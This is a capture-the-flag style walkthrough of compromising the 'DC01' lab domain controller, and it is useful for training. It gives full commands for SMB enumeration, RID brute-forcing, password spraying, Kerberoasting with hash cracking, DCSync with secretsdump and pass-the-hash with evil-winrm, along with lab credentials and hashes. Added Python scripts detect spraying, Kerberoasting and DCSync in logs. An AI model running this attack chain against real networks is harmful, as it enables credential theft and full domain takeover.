DC01

Configuration:

First, click the Download button to download the machine:

Unzip it after downloading:

Let's open it in VirtualBox:

Then, to configure the network, go to Network:

And create a new NAT network:

Now we have to change the network interface of both the DC machine and our Kali machine so they can reach each other:

And start both of them:

When we see this pane in DC01, we leave it there and move to our Kali machine to start hacking:

Enumeration:

Get our IP, then run an SMB sweep of the subnet to find which other hosts are up:

ifconfig
netexec smb 10.0.2.0/24

Here is the IP of the target machine.

Before anything else, let's add this IP to the hosts file:

sudo vim /etc/hosts

10.0.2.28 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL

:wq
ping soupedecode.local

Let's start an nmap scan of all ports on the target system:

sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local
  • nmap: Network Mapper, used to scan hosts and ports.

  • -sC: Use default nmap scripts.

  • -sV: Service version enumeration.

  • --min-rate 4000: Speed up the scan.

  • -oN nmap/allports: Output the result in normal format.

  • -vv: Increase verbosity.

It is an Active Directory domain controller.

Starting with SMB (port 445):

Check if anonymous login is allowed:

netexec smb soupedecode.local -u '' -p ''
  • smb: Protocol we want to use.

  • -u: Specify the username to authenticate with.

  • -p: The password to authenticate with.

Access denied.

Let's try with the guest account:

netexec smb soupedecode.local -u 'guest' -p ''

We have access as the guest user.

Now let's see whether there are shares we have read/write access to:

netexec smb soupedecode.local -u 'guest' -p '' --shares

We only have read access to the IPC$ share, which is present by default and not interesting by itself.

OK, let's try to dump the users, since we have access to IPC$:

netexec smb soupedecode.local -u 'guest' -p '' --users

It seems we cannot; let's try --rid-brute:

netexec smb soupedecode.local -u 'guest' -p '' --rid-brute
  • --rid-brute: Perform RID (Relative Identifier) brute-forcing, enumerating SIDs by their RID (e.g. 500: Administrator, 1103: bmark0, etc.).

We dumped the users:

Save the output to a file (temp.txt) and filter it to keep only the usernames (the SidTypeUser lines):

cat temp.txt | grep 'SidTypeUser' | awk '{print $6}' | cut -d '\' -f 2 > users.txt

At this point we can perform several attacks, such as password spraying if we have a candidate password, or AS-REP Roasting if any account has Kerberos pre-authentication disabled.

Exploitation:

Let's try a password spray where each password is the same as the username:

netexec smb soupedecode.local -u users.txt -p users.txt --no-bruteforce --continue-on-success
  • --no-bruteforce: Pair each username only with the password on the same line, instead of trying every combination.

  • --continue-on-success: Do not stop after the first valid credential is found.

We got these credentials (ybob317:ybob317).
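From the defender's side, the spray above leaves a recognisable trace on the domain controller: one source address failing logons (event 4625) against many different accounts in a short window, sometimes followed by a success (event 4624) for one of them. The following script is an added example, not part of the original writeup, that runs that heuristic over a handful of constructed logon records; the field names mirror the Security log (TargetUserName, IpAddress, EventID) but the timestamps, users and the 10.0.2.15 source address are made up for the demonstration.

```python
"""Flag a password-spray pattern in Windows logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: one host fails against five accounts within
# seconds and then logs on as a sixth; a normal user mistypes once and
# then succeeds.  Nothing here comes from a real log.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:01", "event_id": 4625, "user": "bmark0",   "ip": "10.0.2.15"},
    {"time": "2024-01-01T10:00:02", "event_id": 4625, "user": "jdoe1",    "ip": "10.0.2.15"},
    {"time": "2024-01-01T10:00:03", "event_id": 4625, "user": "ksmith2",  "ip": "10.0.2.15"},
    {"time": "2024-01-01T10:00:04", "event_id": 4625, "user": "file_svc", "ip": "10.0.2.15"},
    {"time": "2024-01-01T10:00:05", "event_id": 4625, "user": "admin5",   "ip": "10.0.2.15"},
    {"time": "2024-01-01T10:00:06", "event_id": 4624, "user": "ybob317",  "ip": "10.0.2.15"},
    {"time": "2024-01-01T10:03:00", "event_id": 4625, "user": "alice",    "ip": "10.0.2.40"},
    {"time": "2024-01-01T10:03:10", "event_id": 4624, "user": "alice",    "ip": "10.0.2.40"},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {ip: {"accounts": [...], "success": [...]}} for every source that
    failed against at least `min_accounts` distinct users inside `window`.
    "success" lists accounts that logged on from that source during the same
    window, i.e. the spray probably found a valid password."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    successes = defaultdict(list)  # ip -> [(time, user)]
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["event_id"] == 4625:
            failures[ev["ip"]].append((t, ev["user"]))
        elif ev["event_id"] == 4624:
            successes[ev["ip"]].append((t, ev["user"]))

    findings = {}
    for ip, fails in failures.items():
        # Sliding window: starting at each failure, count the distinct accounts
        # tried within `window`; the first window that crosses the threshold wins.
        for i, (start, _) in enumerate(fails):
            in_window = [u for (t, u) in fails[i:] if t - start <= window]
            distinct = sorted(set(in_window))
            if len(distinct) >= min_accounts:
                end = start + window
                hits = sorted({u for (t, u) in successes[ip] if start <= t <= end})
                findings[ip] = {"accounts": distinct, "success": hits}
                break
    return findings


if __name__ == "__main__":
    for ip, info in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {ip}: {len(info['accounts'])} accounts tried, "
              f"successful logon(s): {info['success'] or 'none'}")
```

The threshold of four distinct accounts in five minutes is a starting point, not a fixed rule; a real deployment would tune it to the environment and would also key on the Kerberos pre-authentication failure event (4771), since netexec against SMB produces NTLM failures but other spray tools go through Kerberos.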

Let's perform a Kerberoasting attack, since we now have valid domain credentials:

impacket-GetUserSPNs -dc-ip 10.0.2.28 soupedecode.local/ybob317:'ybob317' -request -outputfile users.hashes

We got a "clock skew too great" error. Kerberos rejects authentication when the client's clock and the KDC's clock differ by more than the allowed limit (5 minutes by default).

So we need to sync our Kali system clock with the target's NTP service (the domain controller):

sudo ntpdate 10.0.2.28

Now perform the attack again:

We got the TGS hashes for those users; now let's try to crack them:

hashcat users.hashes /usr/share/wordlists/rockyou.txt

It detected the hash types itself.

Only one hash was cracked: the one for the user file_svc, whose password is Password123!!.

If we check the shares again with these credentials:

We now have read access to the backup share; let's connect to it with smbclient:

smbclient \\\\10.0.2.28\\backup -U 'file_svc%Password123!!'

The share contains only one txt file, which holds NTLM hashes.

Post-Exploitation:

Let's see whether any of those hashes are still valid:

The fileserver$ machine account is still valid, and it has administrative rights.

Let's perform DCSync to dump all domain user hashes:

impacket-secretsdump -just-dc soupedecode.local/'fileserver$'@10.0.2.28 -hashes :e41da7e79a4c76dbd9cf79d1cb325559
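Both the Kerberoasting step above and this DCSync step are visible in the domain controller's Security log, and a defender would want detections for each. Kerberoasting shows up as event 4769 (service ticket requested) with the RC4-HMAC encryption type (0x17) for ordinary service accounts, typically several of them from one user in quick succession. A DCSync shows up as event 4662 (operation performed on an object) whose Properties field carries the directory-replication control-access-right GUIDs, issued by an account that is not a domain controller. The script below is an added example, not part of the original writeup: the event records are constructed to mirror the two steps (ybob317 requesting RC4 tickets for several services, and the fileserver$ account replicating the domain), the field names follow the Windows Security log, and the DC_ACCOUNTS allow-list is an assumption for this lab domain.

```python
"""Flag Kerberoasting (4769) and DCSync (4662) patterns in DC events (added example)."""
import re
from collections import defaultdict

# Assumed for this lab: DC01$ is the only account that legitimately replicates.
DC_ACCOUNTS = {"DC01$"}

# Control-access-right GUIDs that directory replication (and thus DCSync) needs.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4; AES tickets are 0x11/0x12
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed sample events; none of these come from a real log.
SAMPLE_EVENTS = [
    {"event_id": 4769, "user": "ybob317", "service": "file_svc", "enc": "0x17"},
    {"event_id": 4769, "user": "ybob317", "service": "sql_svc",  "enc": "0x17"},
    {"event_id": 4769, "user": "ybob317", "service": "web_svc",  "enc": "0x17"},
    {"event_id": 4769, "user": "alice",   "service": "DC01$",    "enc": "0x12"},
    {"event_id": 4769, "user": "alice",   "service": "krbtgt",   "enc": "0x12"},
    {"event_id": 4662, "user": "DC01$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event_id": 4662, "user": "fileserver$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event_id": 4662, "user": "bob",
     "properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # unrelated object-type GUID
]


def is_roastable_service(name):
    """Ticket requests for krbtgt and for computer accounts are normal noise;
    user-owned service accounts with SPNs are what kerberoasting targets."""
    return name.lower() != "krbtgt" and not name.endswith("$")


def detect_kerberoast(events, min_services=3):
    """Return {requesting_user: [service accounts]} for users that requested RC4
    service tickets for at least `min_services` distinct roastable accounts."""
    by_user = defaultdict(set)
    for ev in events:
        if ev["event_id"] == 4769 and ev["enc"] == RC4_HMAC and is_roastable_service(ev["service"]):
            by_user[ev["user"]].add(ev["service"])
    return {u: sorted(s) for u, s in by_user.items() if len(s) >= min_services}


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """Return the sorted list of non-DC accounts that exercised a replication
    right (4662 whose Properties contain one of REPLICATION_GUIDS)."""
    flagged = set()
    for ev in events:
        if ev["event_id"] != 4662 or ev["user"] in dc_accounts:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("properties", ""))}
        if guids & REPLICATION_GUIDS:
            flagged.add(ev["user"])
    return sorted(flagged)


if __name__ == "__main__":
    for user, services in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"possible kerberoasting by {user}: RC4 tickets for {', '.join(services)}")
    for user in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by non-DC account {user}")
```

The 4662 rule only fires if the domain object is audited for "Replicating Directory Changes" rights (a SACL on the domain head with the Directory Service Access subcategory enabled); without that auditing the event is never written, which is the first thing to verify before trusting the detection.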

This gives us the domain administrator's NTLM hash, which we can use to authenticate via psexec, WinRM or WMI:

evil-winrm -i 10.0.2.28 -u administrator -H 88d40c3a9a98889f5cbb778b0db54a2f

Here is the root flag; the user flag is in ybob317's Desktop folder.
